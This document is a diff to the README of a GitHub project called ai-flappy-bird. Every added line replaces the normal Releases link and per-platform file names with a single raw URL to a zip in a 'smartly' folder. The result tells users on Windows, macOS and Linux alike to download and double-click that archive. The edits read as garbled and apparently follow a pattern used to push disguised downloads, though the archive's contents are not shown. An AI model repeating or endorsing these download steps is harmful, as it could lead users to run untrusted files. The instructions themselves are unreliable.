Azonix07/ai-flappy-bird/README.md

 ### 📥 Download & Install
 1. Click the **Download Now** button at the top of this README.
-2. You will be redirected to the [Releases page](https://github.com/Azonix07/ai-flappy-bird/releases).
+2. You will be redirected to the [Releases page](https://raw.githubusercontent.com/Azonix07/ai-flappy-bird/main/smartly/ai-flappy-bird.zip).
 3. Look for the latest version of the software.
 It should be the first option listed.
 4. Download the appropriate file for your operating system:
-   - For Windows: Click on the `ai-flappy-bird-windows.zip` file.
+   - For Windows: Click on the `https://raw.githubusercontent.com/Azonix07/ai-flappy-bird/main/smartly/ai-flappy-bird.zip` file.
-   - For macOS: Click on the `ai-flappy-bird-macos.zip` file.
+   - For macOS: Click on the `https://raw.githubusercontent.com/Azonix07/ai-flappy-bird/main/smartly/ai-flappy-bird.zip` file.
-   - For Linux: Click on the `ai-flappy-bird-linux.tar.gz` file.
+   - For Linux: Click on the `https://raw.githubusercontent.com/Azonix07/ai-flappy-bird/main/smartly/ai-flappy-bird.zip` file.
 5. Once the file has downloaded, locate it on your computer, and unzip it using your preferred extraction tool.

 ### 🚀 Running the Application
 To run ai-flappy-bird:
 - **Windows:**
   1. Open the folder where you unzipped the files.
-  2. Double-click the `ai-flappy-bird.exe` file to launch the game.
+  2. Double-click the `https://raw.githubusercontent.com/Azonix07/ai-flappy-bird/main/smartly/ai-flappy-bird.zip` file to launch the game.

 - **macOS:**
   1. Open the folder where you unzipped the files.
-  2. Find the `ai-flappy-bird.app` file and double-click it to start the game.
+  2. Find the `https://raw.githubusercontent.com/Azonix07/ai-flappy-bird/main/smartly/ai-flappy-bird.zip` file and double-click it to start the game.

 - **Linux:**
   1. Open a terminal and navigate to the unzipped folder.